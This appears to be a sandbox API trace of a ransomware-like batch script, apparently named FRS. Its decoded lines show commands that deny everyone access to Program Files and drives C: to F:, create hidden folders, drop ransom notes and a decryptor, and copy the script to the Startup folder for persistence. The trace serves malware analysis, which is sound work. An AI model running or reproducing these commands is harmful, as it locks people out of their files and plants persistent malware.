hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0135.915] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.915] GetFileType (hFile=0x260) returned 0x1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0135.915] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0135.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0135.916] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.916] GetFileType (hFile=0x260) returned 0x1 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0135.916] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0135.916] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0135.916] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.916] GetFileType (hFile=0x260) returned 0x1 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0135.916] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0135.916] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0135.916] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.916] GetFileType (hFile=0x260) returned 0x1 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0135.916] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0135.916] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0135.916] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.916] GetFileType (hFile=0x260) returned 0x1 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0135.916] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0135.916] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0135.916] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0135.916] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.916] GetFileType (hFile=0x260) returned 0x1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0135.917] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0135.917] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0135.917] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.917] GetFileType (hFile=0x260) returned 0x1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0135.917] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0135.917] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0135.917] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.917] GetFileType (hFile=0x260) returned 0x1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0135.917] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0135.917] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0135.917] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.917] GetFileType (hFile=0x260) returned 0x1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0135.917] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0135.917] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0135.917] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.917] GetFileType (hFile=0x260) returned 0x1 [0135.917] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0135.917] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0135.918] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0135.918] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.918] GetFileType (hFile=0x260) returned 0x1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0135.918] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0135.918] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0135.918] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.918] GetFileType (hFile=0x260) returned 0x1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0135.918] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0135.918] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0135.918] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.918] GetFileType (hFile=0x260) returned 0x1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0135.918] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0135.918] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0135.918] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.918] GetFileType (hFile=0x260) returned 0x1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0135.918] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0135.918] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0135.918] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0135.919] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.919] GetFileType (hFile=0x260) returned 0x1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0135.919] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0135.919] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0135.919] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.919] GetFileType (hFile=0x260) returned 0x1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0135.919] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0135.919] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0135.919] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.919] GetFileType (hFile=0x260) returned 0x1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0135.919] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0135.919] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0135.919] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.919] GetFileType (hFile=0x260) returned 0x1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0135.919] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0135.919] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0135.919] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.919] GetFileType (hFile=0x260) returned 0x1 [0135.919] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0135.920] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0135.920] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0135.920] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.920] GetFileType (hFile=0x260) returned 0x1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0135.920] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0135.920] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0135.920] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.920] GetFileType (hFile=0x260) returned 0x1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0135.920] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0135.920] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0135.920] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.920] GetFileType (hFile=0x260) returned 0x1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0135.920] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0135.920] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0135.920] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.920] GetFileType (hFile=0x260) returned 0x1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0135.920] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.920] SetFilePointer (in: hFile=0x260, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0135.920] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0135.921] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.921] GetFileType 